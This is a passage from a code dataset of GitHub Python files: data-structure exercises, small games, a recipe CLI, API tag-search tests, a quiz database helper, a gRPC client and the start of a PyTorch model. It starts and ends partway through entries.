rep:\n need = d // power[rep]\n fol += need\n \n if fol <= rep and (need + 1) * power[rep] > d:\n wins += 1\n \n rep -= 1\n \nprint(wins)\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_54/basketball-together.py","file_name":"basketball-together.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25792313794","text":"# 232 Implement Queue using Stacks\n\"\"\"\nQueue is FIFO (first in - first out) data structure, \nin which the elements are inserted from one side - rear \nand removed from the other - front. \n\nThe most intuitive way to implement it is with linked lists, \nbut this article will introduce another approach using stacks. \n\nStack is LIFO (last in - first out) data structure, \nin which elements are added and removed from the same end, called top. \n\nTo satisfy FIFO property of a queue we need to keep two stacks. \nThey serve to reverse arrival order of the elements and \none of them store the queue elements in their final order.\n\"\"\"\n\n# Two stacks\n# Push - O(1)\n# Pop - O(1)\nclass MyQueue(object):\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.front = []\n self.back = []\n \n\n def push(self, x):\n \"\"\"\n Push element x to the back of queue.\n :type x: int\n :rtype: None\n \"\"\"\n self.back.append(x)\n \n\n def pop(self):\n \"\"\"\n Removes the element from in front of queue and returns that element.\n :rtype: int\n \"\"\"\n if self.front:\n return self.front.pop()\n else:\n while self.back:\n self.front.append(self.back.pop())\n\n if self.front:\n return self.front.pop()\n else:\n return None\n \n\n def peek(self):\n \"\"\"\n Get the front element.\n :rtype: int\n \"\"\"\n if self.front:\n return self.front[-1]\n else:\n while self.back:\n self.front.append(self.back.pop())\n\n if self.front:\n return self.front[-1]\n else:\n return None\n \n\n def empty(self):\n \"\"\"\n Returns whether the queue is empty.\n :rtype: bool\n \"\"\"\n if not self.front and not self.back:\n return True\n else:\n return False\n \n\n\n# Your MyQueue object will be instantiated and called as such:\n# obj = MyQueue()\n# obj.push(x)\n# param_2 = obj.pop()\n# param_3 = obj.peek()\n# param_4 = obj.empty()","repo_name":"yananfei-Bette/Leetcode","sub_path":"interview/amazon/amazon_vo/232_Implement_Queue_using_Stacks.py","file_name":"232_Implement_Queue_using_Stacks.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10079442757","text":"from data import *\nfrom fonctions import * \n\nscores = retreive_score()\nuser = retreive_user_name()\n\nif user not in scores.keys():\n scores[user] = 0\ncontinuer_partie = 'o'\n\nwhile continuer_partie != 'n':\n print (\"(player{0} : {1} point(s)\" .format(user, scores[user])) \n word_to_find= choose_word()\n found_words = []\n find_word = retreive_mask_word(word_to_find,found_words)\n nb_chances =nb_coups\n while word_to_find != find_word and nb_chances > 0:\n print ( \"words to find {0} (encore {1} chances)\" .format(find_word,nb_chances))\n letter = retreive_letter()\n if letter in found_words:\n print (\"you have already found this letter \") \n elif letter in word_to_find:\n found_words.append(letter)\n print (\"good job\")\n print ( \"words to find {0}\" .format(find_word))\n \n else: \n nb_chances -= 1\n print (\".. non , this letter is not is this word \")\n find_word = retreive_mask_word(word_to_find,found_words)\n if word_to_find == find_word:\n print (\"bravo you have find{0}.\" .format(word_to_find))\n else:\n print (\"lost you have been hanged\")\n scores[user] +=nb_chances\n continuer_partie = input (\"do you want to continue o/n\")\n continuer_partie = continuer_partie.lower()\nsave_score(scores)\n\nprint (\"you finish the game with {0} points \". format(scores[user]))\n \n \n \n\n\n","repo_name":"danprasfr/TrainingProject","sub_path":"Exercice2/Ga_pen.py","file_name":"Ga_pen.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70517669033","text":"\n# Run some recommendation experiments using MovieLens 100K\nimport pandas\nimport numpy as np \nimport scipy.sparse\nimport scipy.sparse.linalg\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ndef euclidean_distance(v1, v2):\n\treturn np.linalg.norm(v1 - v2)\n\ndef greedy_select(X, trials=10): \n\t'''\n\tGreedily select points according to which is \n\tclosest to any previously seen sample\n\n\tDistance Metric: Euclidean \n\t'''\n\n\tk = 2 # For visualization\n\tn = X_train.shape[0]\n\n\tU, s, Vt = np.linalg.svd(X_train, full_matrices=False)\n\n\tX_svd = U[:, 0:k].dot(np.diag(s[0:k]))\n\n\t# Select first point (def not random)\n\tseen = [0]\n\tfor _ in range(trials):\n\n\t\t# Looking for point with smallest minimum distance\n\t\tmin_seen = [float('inf'), -1]\n\t\tfor i in [x for x in range(n) if x not in seen]:\n\t\t\tfor j in seen:\n\t\t\t\tv1 = X_svd[i,:]\n\t\t\t\tv2 = X_svd[j,:]\n\t\t\t\t#dist = 1.0 - cosine_similarity(v1, v2)[0][0]\n\t\t\t\t#dist = cosine_similarity(v1, v2)[0][0]\n\t\t\t\tdist = euclidean_distance(v1, v2)\n\t\t\t\tif dist < min_seen[0]:\n\t\t\t\t\tmin_seen = [dist, i]\n\n\t\tseen.append(min_seen[1])\n\t\t\n\t\tplt.scatter(X_svd[:,0], X_svd[:,1], c=categories, alpha=0.01)\n\t\tplt.scatter(X_svd[seen,0], X_svd[seen,1], s=100,c=[0.0]*len(seen), alpha=0.7)\n\t\tplt.show()\n\n\tprint(seen)\n\n\treturn\n\ndef antigreedy_select(X, trials=10):\n\t'''\n\tSelect points according to which is \n\tfurthest from any previously seen sample\n\n\tDistance Metric: Euclidean\n\t'''\n\n\tk = 2 # For visualization\n\tn = X_train.shape[0]\n\n\tU, s, Vt = np.linalg.svd(X_train, full_matrices=False)\n\n\tX_svd = U[:, 0:k].dot(np.diag(s[0:k]))\n\n\t# Select first point (def not random)\n\tseen = [0]\n\tfor _ in range(trials):\n\n\t\t# Looking for point with largest minimum distance\n\t\tmax_min_seen = [float('-inf'), -1]\n\n\t\t# For each potential sample\n\t\tfor i in [x for x in range(n) if x not in seen]:\n\n\t\t\t# Calculate the minimum distance\n\t\t\tmin_seen = [float('inf'), -1]\n\n\t\t\t# To all previously seen samples\n\t\t\tfor j in seen:\n\t\t\t\tv1 = X_svd[i,:]\n\t\t\t\tv2 = X_svd[j,:]\n\t\t\t\t#dist = 1.0 - cosine_similarity(v1, v2)[0][0]\n\t\t\t\t#dist = cosine_similarity(v1, v2)[0][0]\n\t\t\t\tdist = euclidean_distance(v1, v2)\n\t\t\t\tif dist < min_seen[0]:\n\t\t\t\t\tmin_seen = [dist, i]\n\n\t\t\tif min_seen[0] > max_min_seen[0]:\n\t\t\t\tmax_min_seen = min_seen\n\n\t\tseen.append(max_min_seen[1])\n\t\t\n\t\tplt.scatter(X_svd[:,0], X_svd[:,1], c=categories, alpha=0.01)\n\t\tplt.scatter(X_svd[seen,0], X_svd[seen,1], s=100,c=[0.0]*len(seen), alpha=0.7)\n\t\tplt.show()\n\n\tprint(seen)\n\n\treturn\n\n\nif __name__ == \"__main__\":\n\tdata_dir = \"data/ml-100k/\"\n\n\tdf = pandas.read_csv(data_dir + \"u.item\", sep=\"|\", header=-1, encoding='latin-1')\n\tvalues = df.values\n\n\t# Maintain genre data, movie_title\n\tX_titles = values[:,1]\n\tX_train = np.asfarray(values[:, 5:])\n\n\trow_sums = X_train.sum(axis=1)\n\tX_train = X_train / row_sums[:, np.newaxis]\n\n\tcategories = [np.argmax(X_train[i,:]) for i in range(X_train.shape[0])]\n\n\t#greedy_select(X_train, trials=10)\n\tantigreedy_select(X_train, trials=10)\n\n\n","repo_name":"dricciardelli/active_recommendation","sub_path":"movielens_content.py","file_name":"movielens_content.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28792239278","text":"import pytest\nimport json\n\n\nclass TestRecordingsGetByTags:\n def testFindRecordingTags(self, helper):\n lucy = helper.given_new_user(self, \"lucy\")\n group = lucy.create_group(helper.make_unique_group_name(self, \"lucys_group\"))\n device = helper.given_new_device(self, \"Rec\", group, description=\"\")\n\n untagged = device.has_recording()\n human_cool_cat = makeTrackTaggedRecording(\n device, helper, lucy, [[None, \"cat\"]], human_recordingTags=[\"cool\"]\n )\n human_missed_track = makeTaggedRecording(device, helper, [], lucy, [\"missed track\"])\n human_multiple_animals = makeTaggedRecording(device, helper, [], lucy, [\"multiple animals\"])\n human_trapped = makeTaggedRecording(device, helper, [], lucy, [\"trapped in trap\"])\n\n ai_multiple = makeTaggedRecording(device, helper, [\"multiple animals\"], lucy, [])\n\n ai_possum = makeTrackTaggedRecording(device, helper, lucy, [[\"possum\", None]])\n human_possum = makeTrackTaggedRecording(device, helper, lucy, [[None, \"possum\"]])\n ai_human_possum = makeTrackTaggedRecording(\n device, helper, lucy, [[\"possum\", \"possum\"]], human_recordingTags=[\"cool\"]\n )\n\n ai_possum2 = makeTrackTaggedRecording(device, helper, lucy, [[\"possum\", None], [\"cat\", None]])\n human_cat_possum2 = makeTrackTaggedRecording(\n device, helper, lucy, [[\"cat\", None], [\"cat\", \"possum\"]], ai_RecordingTags=[\"multiple animals\"]\n )\n ai_human_possum2 = makeTrackTaggedRecording(device, helper, lucy, [[\"possum\", \"possum\"]])\n\n # ai and human tags different - one track, on recording.\n ai_human_possum3 = makeTrackTaggedRecording(device, helper, lucy, [[None, \"possum\"]])\n ai_human_possum3.is_tagged_as(what=\"possum\").byAI(helper.admin_user())\n\n all = set(\n [\n untagged,\n ai_possum,\n ai_possum2,\n human_possum,\n human_cat_possum2,\n ai_human_possum,\n ai_human_possum2,\n ai_human_possum3,\n human_cool_cat,\n ai_multiple,\n human_trapped,\n human_multiple_animals,\n human_missed_track,\n ]\n )\n\n all_untagged = set([untagged, human_missed_track, human_multiple_animals, human_trapped, ai_multiple])\n lucy.when_searching_for_tagmode_and_tags(\"any\", []).can_see_all_recordings_from_(all)\n\n expected = all.copy()\n expected = expected - all_untagged\n expected.remove(human_cool_cat)\n\n lucy.when_searching_for_tagmode_and_tags(\"tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n expected = [human_possum, human_cat_possum2, ai_human_possum, ai_human_possum2, ai_human_possum3]\n lucy.when_searching_for_tagmode_and_tags(\"human-tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n expected = [ai_possum, ai_possum2, ai_human_possum, ai_human_possum2]\n lucy.when_searching_for_tagmode_and_tags(\"automatic-tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n expected = [ai_human_possum, ai_human_possum2]\n lucy.when_searching_for_tagmode_and_tags(\"both-tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n # Other animals\n expected_rat_cat = [ai_possum2, human_cat_possum2, human_cool_cat]\n lucy.when_searching_for().tagmode(\"tagged\").tags([\"rat\", \"cat\"]).can_only_see_recordings(\n *expected_rat_cat\n ).from_(all)\n\n expected = all.copy()\n expected = expected - all_untagged\n lucy.when_searching_for().tagmode(\"tagged\").tags([\"rat\", \"cat\", \"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n # no animal tags\n expected = [untagged]\n lucy.when_searching_for_tagmode(\"untagged\").can_only_see_recordings(*expected).from_(all)\n\n expected = [untagged, ai_possum, ai_possum2, ai_multiple]\n lucy.when_searching_for_tagmode(\"no-human\").can_only_see_recordings(*expected).from_(all)\n\n expected = [ai_possum, ai_possum2, ai_multiple]\n lucy.when_searching_for_tagmode(\"automatic-only\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_possum, human_cool_cat, human_trapped, human_multiple_animals, human_missed_track]\n lucy.when_searching_for_tagmode(\"human-only\").can_only_see_recordings(*expected).from_(all)\n\n expected = [ai_human_possum, ai_human_possum2, ai_human_possum3, human_cat_possum2]\n lucy.when_searching_for_tagmode(\"automatic+human\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_missed_track]\n lucy.when_searching_for_tagmode(\"missed track\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_multiple_animals, human_cat_possum2, ai_multiple]\n lucy.when_searching_for_tagmode(\"multiple animals\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_trapped]\n lucy.when_searching_for_tagmode(\"trapped in trap\").can_only_see_recordings(*expected).from_(all)\n\n expected = [ai_human_possum, human_cool_cat]\n lucy.when_searching_for_tagmode(\"cool\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_cool_cat]\n lucy.when_searching_for_tagmode(\"cool\").tags([\"cat\"]).can_only_see_recordings(*expected).from_(all)\n\n def testInterestingRecordingTrackTags(self, helper):\n julie = helper.given_new_user(self, \"julie\")\n group = julie.create_group(helper.make_unique_group_name(self, \"julies_group\"))\n device = helper.given_new_device(self, \"Rec\", group, description=\"\")\n\n animal = makeTrackTaggedRecording(device, helper, julie, [[\"possum\", None]])\n false_positive = makeTrackTaggedRecording(device, helper, julie, [[None, \"false positive\"]])\n bird = makeTrackTaggedRecording(device, helper, julie, [[\"bird\", \"bird\"]])\n\n all = [animal, false_positive, bird]\n\n julie.when_searching_for_tagmode_and_tags(\"tagged\", [\"interesting\"]).can_only_see_recordings(\n animal\n ).from_(all)\n julie.when_searching_for().tagmode(\"tagged\").tags([\"interesting\", \"bird\"]).can_only_see_recordings(\n animal, bird\n ).from_(all)\n julie.when_searching_for().tagmode(\"tagged\").tags(\n [\"interesting\", \"false positive\"]\n ).can_only_see_recordings(animal, false_positive).from_(all)\n\n\ndef makeTaggedRecording(device, helper, ai_tags, tagger, human_tags):\n recording = device.has_recording()\n recording.name = \"ai:\" + str(ai_tags) + \" human: \" + str(human_tags)\n if ai_tags:\n for tag in ai_tags:\n recording.is_tagged_as(what=tag).byAI(helper.admin_user())\n if human_tags:\n for tag in human_tags:\n recording.is_tagged_as(what=tag).by(tagger)\n return recording\n\n\ndef makeTrackTaggedRecording(\n device, helper, tagger, trackTags, ai_RecordingTags=None, human_recordingTags=None\n):\n recording = makeTaggedRecording(device, helper, ai_RecordingTags, tagger, human_recordingTags)\n for combo in trackTags:\n recording.name += \"tags: \" + str(combo)\n track = helper.admin_user().can_add_track_to_recording(recording)\n if combo[0]:\n helper.admin_user().tag_track_as_AI(track, combo[0])\n if combo[1]:\n tagger.tag_track(track, combo[1])\n return recording\n","repo_name":"TheCacophonyProject/cacophony-api","sub_path":"test/test_recordings_get_by_tags.py","file_name":"test_recordings_get_by_tags.py","file_ext":"py","file_size_in_byte":7587,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"35051923257","text":"from tkinter import *\nfrom tkinter import font\n\nclass TicTacToe:\n window = Tk()\n img_empty = PhotoImage(file = \"image/Title.gif\").zoom(3)\n img_O = PhotoImage(file = \"image/o.gif\").zoom(3)\n img_X = PhotoImage(file = \"image/x.gif\").zoom(3)\n\n def __init__(self):\n self.window.geometry(\"300x450+450+450\")\n \n self.turn = 'X'\n self.run = True\n\n self.fontTitle = font.Font(self.window, size=16, weight='bold', family = '윤고딕230')\n\n self.frameTitle = Frame(self.window, padx=10, pady=10, bg='#ffc4c4') # 제목 프레임\n self.frameTitle.pack(side=\"top\",fill=\"both\")\n\n self.MainText = Label(self.frameTitle, font = self.fontTitle, text=\"TIC - TAC - TOE GAME\",bg='#fff8dd') # 제목 적기\n self.MainText.pack(anchor=\"center\", fill=\"both\")\n\n self.frame = Frame(self.window, bg='#fff8dd')\n self.frame.pack(side=\"top\",fill=\"both\")\n\n self.frameResult = Frame(self.window, padx=10, pady=10, bg='#ffc4c4') # 하단 설명 프레임 \n self.frameResult.pack(side=\"bottom\",fill=\"both\")\n\n self.ResultText = Label(self.frameResult, font = self.fontTitle, text=self.turn + \"의 차례\",bg='#fff8dd') # 하단 설명 적기\n self.ResultText.pack(anchor=\"center\", fill=\"both\")\n\n self.buttonList = []\n for r in range(3):\n for c in range(3):\n if r == 0:\n self.buttonList.append(Button(self.frame,image=self.img_empty,text=0, command=lambda R=r, C=c:self.press(R,C),width=94,height=94,bg = '#ffd6d6' ))\n elif r == 1:\n self.buttonList.append(Button(self.frame,image=self.img_empty,text=0, command=lambda R=r, C=c:self.press(R,C),width=94,height=94,bg = '#feffd6' ))\n elif r == 2:\n self.buttonList.append(Button(self.frame,image=self.img_empty,text=0, command=lambda R=r, C=c:self.press(R,C),width=94,height=94,bg = '#d8ffd6' ))\n self.buttonList[r*3+c].grid(row=r,column=c)\n\n def press(self,r,c):\n if not self.run:\n return\n\n if self.buttonList[r*3+c]['text'] == 0:\n if self.turn == 'X':\n self.buttonList[r*3+c].configure(image=self.img_X, text=1)\n self.turn = 'O'\n elif self.turn == 'O':\n self.buttonList[r*3+c].configure(image=self.img_O, text=-1)\n self.turn = 'X'\n self.ResultText.configure(text=self.turn + \"의 차례\")\n\n self.Referee()\n \n\n def Referee(self):\n indexes = [[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 3, 6], [1, 4, 7], [2, 5, 8], [0, 4, 8], [2, 4, 6]]\n result = []\n for index in indexes:\n result.append(sum([self.buttonList[d]['text'] for d in index]))\n\n if 3 in result:\n self.turn = 'X'\n self.run = False\n if -3 in result:\n self.turn = 'O'\n self.run = False\n\n if not 0 in [b['text'] for b in self.buttonList]:\n self.run = False\n self.turn = ''\n\n if not self.run:\n if self.turn == 'O' or self.turn == 'X':\n self.ResultText.configure(text=self.turn + \" 승리! 게임이 끝났습니다.\")\n else:\n self.ResultText.configure(text=\"무승부! 게임이 끝났습니다.\")\n \n def loop(self):\n self.window.mainloop()\n \nttt = TicTacToe()\nttt.loop()","repo_name":"truebird2201/scriptlang","sub_path":"game/tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24745214978","text":"import sys \n\ndef count_n_arg():\n arg_list = sys.argv\n n_arg = len(arg_list)\n return n_arg\n\n\ndef get_user_input():\n print('Please select an option:')\n user_input = input()\n return user_input\n\n\ndef print_menu():\n print('================================')\n print('Welcome to the Python Cookbook !')\n print('List of available options:')\n print('1: Add a recipe')\n print('2: Delete a recipe')\n print('3: Print a recipe')\n print('4: Print the cookbook')\n print('5: Quit')\n print('================================')\n\n\ndef add_recipe(recipes, data):\n print('================================')\n print('Please enter the name of the recipe to add:')\n name = input()\n recipes.append(name)\n # create a new_recipe dict\n new_recipe = {}\n print('================================')\n print('Please enter ingredients of the recipe:')\n ingredients = []\n while True:\n ingredient = input()\n if ingredient == '':\n break\n else:\n ingredients.append(ingredient)\n print('================================')\n print('Please enter the meal type of the recipe:')\n meal_type = input()\n while True:\n print('================================')\n print('Please enter the preparation time of the recipe:')\n prep_time = input()\n if input_is_int(prep_time) is True and int(prep_time) > 0:\n break\n else:\n print('Preparation time should be a non-negative integer')\n # add ingredients, meal and prep_time to new_recipe dict\n new_recipe['ingredients'] = ingredients\n new_recipe['meal'] = meal_type\n new_recipe['prep_time'] = prep_time\n # add new_recipe dict to data list, then zip recipes and data lists\n data.append(new_recipe)\n new_recipe = dict(zip(recipes, data))\n return new_recipe\n\n\ndef delete_recipe(recipe_name):\n hashable_cookbook = [(key, value) for key, value in cookbook.items()]\n i_to_del = -1\n for i_recipe in range(len(hashable_cookbook)):\n if hashable_cookbook[i_recipe][0] == recipe_name:\n i_to_del = i_recipe\n if i_to_del != -1:\n hashable_cookbook.pop(i_to_del)\n new_cookbook = dict(hashable_cookbook)\n return new_cookbook\n else:\n print('Error !\\nRecipe not found !')\n\n\ndef print_recipes_names(cookbook):\n for recipe in recipes:\n print(recipe)\n\n\ndef print_recipe_details(recipe_name):\n key_list = list(cookbook.keys())\n value_list = list(cookbook.values())\n found = False\n for i in range(0, len(key_list)):\n if key_list[i] == recipe_name:\n print('Ingredients list :', value_list[i]['ingredients'])\n print('To be eaten for :', value_list[i]['meal'])\n print('Preparation time :', value_list[i]['prep_time'])\n found = True\n if found is False:\n print('Error !\\nRecipe not found !')\n\n\ndef input_is_int(str):\n if str[0] in ('-', '+'):\n return str[1:].isdigit()\n else:\n return str.isdigit()\n\n\nif __name__==\"__main__\":\n recipes = ['sandwich', 'cake', 'salad']\n data = [{'ingredients': ['ham', 'bread', 'cheese', 'tomatoes'],\n 'meal': 'lunch',\n 'prep_time': 10},\n {'ingredients': ['flour', 'sugar', 'eggs'],\n 'meal': 'dessert',\n 'prep_time': 60},\n {'ingredients': ['avocado', 'arugula', 'tomatoes', 'spinach'],\n 'meal': 'lunch',\n 'prep_time': 15}]\n cookbook = dict(zip(recipes, data))\n if count_n_arg() > 1:\n print('Error ! Wrong number of arguments')\n print('Usage : python3 recipe.py')\n elif count_n_arg() == 1:\n option = 0\n while (option != 5):\n print_menu()\n try:\n option = int(get_user_input())\n except ValueError:\n print(\"Sorry, this option does not exist.\\n\")\n if option not in range(1, 6):\n print(\"Sorry, this option does not exist.\\n\")\n else:\n if (option == 1):\n cookbook = add_recipe(recipes, data)\n elif(option == 2):\n print('================================')\n print('Please enter the name of the recipe to delete')\n recipe_name = input()\n cookbook = delete_recipe(recipe_name)\n elif (option == 3):\n print('================================')\n print('Please enter the name of the recipe to see its details')\n recipe_name = input()\n print_recipe_details(recipe_name)\n elif (option == 4):\n print('================================')\n print('COOKBOOK')\n for i in range (0, len(cookbook)):\n print('=== RECIPE #', i, ' ===')\n print('Name\\t\\t', ':', recipes[i])\n print(print_recipe_details(recipes[i]))\n print('Cookbook closed. Goodbye !')\n print('================================')\n","repo_name":"Mitsun0bu/42AI-PythonBootcamp","sub_path":"module00/ex06/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285294633","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PySide6.QtWidgets import QMessageBox\n\nfrom baramFlow.coredb import coredb\nfrom baramFlow.coredb.coredb_writer import CoreDBWriter\nfrom baramFlow.coredb.reference_values_db import ReferenceValuesDB\nfrom baramFlow.view.widgets.content_page import ContentPage\nfrom .reference_values_page_ui import Ui_ReferenceValuesPage\n\n\nclass ReferenceValuesPage(ContentPage):\n def __init__(self):\n super().__init__()\n self._ui = Ui_ReferenceValuesPage()\n self._ui.setupUi(self)\n\n self._load()\n\n def save(self):\n xpath = ReferenceValuesDB.REFERENCE_VALUES_XPATH\n\n writer = CoreDBWriter()\n writer.append(xpath + '/area', self._ui.area.text(), self.tr(\"Area\"))\n writer.append(xpath + '/density', self._ui.density.text(), self.tr(\"Density\"))\n writer.append(xpath + '/length', self._ui.length.text(), self.tr(\"Length\"))\n writer.append(xpath + '/velocity', self._ui.velocity.text(), self.tr(\"Velocity\"))\n writer.append(xpath + '/pressure', self._ui.pressure.text(), self.tr(\"Pressure\"))\n\n errorCount = writer.write()\n if errorCount > 0:\n QMessageBox.critical(self, self.tr(\"Input Error\"), writer.firstError().toMessage())\n return False\n\n return True\n\n def _load(self):\n db = coredb.CoreDB()\n\n xpath = ReferenceValuesDB.REFERENCE_VALUES_XPATH\n self._ui.area.setText(db.getValue(xpath + '/area'))\n self._ui.density.setText(db.getValue(xpath + '/density'))\n self._ui.length.setText(db.getValue(xpath + '/length'))\n self._ui.velocity.setText(db.getValue(xpath + '/velocity'))\n self._ui.pressure.setText(db.getValue(xpath + '/pressure'))\n","repo_name":"nextfoam/baram","sub_path":"baramFlow/view/setup/reference_values/reference_values_page.py","file_name":"reference_values_page.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"3181862940","text":"from __future__ import print_function\n\nimport grpc\n\nfrom calculator import calculator_pb2, calculator_pb2_grpc\n\ndef run(i,j):\n channel = grpc.insecure_channel('localhost:50051')\n stub = calculator_pb2_grpc.CalculatorStub(channel)\n response = stub.Add(calculator_pb2.RequestAdd(inputA=i,inputB=j))\n print(response.result)\n\nif __name__ == '__main__':\n for i in range(-2,3):\n for j in range(-2,3):\n run(i,j)\n","repo_name":"rikithamanjunath/cmpe273-lab2","sub_path":"calculator/calculator_client.py","file_name":"calculator_client.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73014497513","text":"# -*- coding: utf-8 -*-\r\n\r\nimport mysql.connector\r\nimport sys\r\n\r\nclass Bdd:\r\n\r\n\t@classmethod\r\n\tdef ouvrir_connexion(cls):\r\n\t\tcls.data = mysql.connector.connect(user ='root', \r\n\t\t\tpassword='root', host='localhost', \r\n\t\t\tdatabase='trivial', port='8081')\r\n\t\tcls.curs = cls.data.cursor()\r\n\r\n\t@classmethod\r\n\tdef fermer_connexion(cls):\r\n\t\tcls.curs.close()\r\n\t\tcls.data.close()\r\n\r\n\t@classmethod\r\n\tdef lister_themes(cls):\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(\"SELECT * FROM theme\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient une liste de tuples [(id_theme1, nom_theme1), (id_theme2, nom_theme2), ...]\r\n\r\n\t@classmethod\r\n\tdef lister_questions_theme(cls, theme): # on renseigne le thème choisi par l'utilisateur\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT id_question, libelle_question, difficulte_question FROM questions WHERE theme_question = {theme}\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient une liste de tuples [(id1, libelle1, diffic1), (id2, libelle2, diffic2), ...] de questions potentielles\r\n\r\n\t@classmethod\r\n\tdef lister_questions_dures(cls, theme, difficulte):\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT id_question, libelle_question, difficulte_question FROM questions WHERE theme_question = {theme} AND difficulte_question = {difficulte}\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient une liste de tuples [(id1, libelle1, diffic1), (id2, libelle2, diffic2), ...] de questions potentielles\r\n\r\n\t@classmethod\r\n\tdef obtenir_lib_dif_question(cls, id): # on renseigne l'id (choisi au hasard parmis les id correspondant au thème)\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT libelle_question, difficulte_question FROM questions WHERE id_question = {id}\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient un tuple (libelle1, diffic1) qui servira à afficher la question et la difficulté\r\n\r\n\t@classmethod\r\n\tdef obtenir_reponse_id(cls, id): # on renseigne l'id de la question qui a été posée à l'utilisateur\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT libelle_reponse FROM reponses WHERE id_question = {id} AND valeur_reponse = 1\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient la bonne réponse\r\n\r\n\t# @classmethod\r\n\t# def lister_joueurs(cls):\r\n\t# \tcls.ouvrir_connexion()\r\n\t# cls.curs.execute(\"SELECT nom_joueur FROM joueurs\")\r\n\t# \tresult= cls.curs.fetchall()\r\n\t# \tcls.fermer_connexion()\r\n\t# \tlj = []\r\n\t# \tfor joueur in result :\r\n\t# \t lj.append(joueur[0])\r\n\t# \treturn lj\r\n\t\r\n\t\r\n# def main():\r\n# \tp = Bdd\r\n# \tl = p.lister_themes()\r\n# \tprint(l) #[(1, 'Big Data'), (2, 'IA'), (3, 'Ethique'), (4, 'Python'), (5, 'Mathématique')]\r\n# \tm = p.lister_questions_theme(3)\r\n# \tprint(m) # [(1, \"Comment appelle-t-on...?\", 1), (2, \"Quel était le nom ... ?\", 2), (3, 'Quelle ... ?', 3)]\r\n# \tn = p.obtenir_lib_dif_question(2)\r\n# \tprint(n) # [(2, \"Quel était le nom ... ?\", 2)]\r\n# \to = p.obtenir_reponse_id(2)\r\n# \tprint(o) # [('Tay',)]\r\n\r\n# main()\r\n\r\n","repo_name":"AudePertron/data_pursuit","sub_path":"connect_bdd.py","file_name":"connect_bdd.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6423493348","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom padding_same_conv import Conv2d\nfrom blurPooling import BlurPool2d\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass STRN(nn.Module):\n def __init__(self, n_view_cells, n_wrd_cells, vsize=7, wdist_size=6, wcode_size=3, emb_size=32, csize=128):\n super(STRN, self).__init__()\n self.n_view_cells = n_view_cells\n self.n_wrd_cells = n_wrd_cells\n self.vsize = vsize\n self.wdist_size = wdist_size\n self.wcode_size = wcode_size\n self.emb_size = emb_size\n self.csize = csize\n\n # Basic Distribution of World Cells\n self.sample_wdist(dist=\"uniform\")\n\n # Distort the World Distribution\n self.w2c = nn.Sequential(\n nn.Linear(wdist_size+vsize, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, wcode_size)\n )\n \n # Camera Space Embedding / Frustum Activation / Occlusion\n self.fc1 = nn.Linear(wcode_size, 256)\n self.fc2 = nn.Linear(256, 256)\n self.fc_act = nn.Linear(256, 1)\n self.fc_emb = nn.Linear(256, emb_size)\n\n # View Space Embedding Network\n self.vse = nn.Sequential(\n nn.Linear(2, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, emb_size)\n )\n\n def sample_wdist(self, dist):\n if dist == 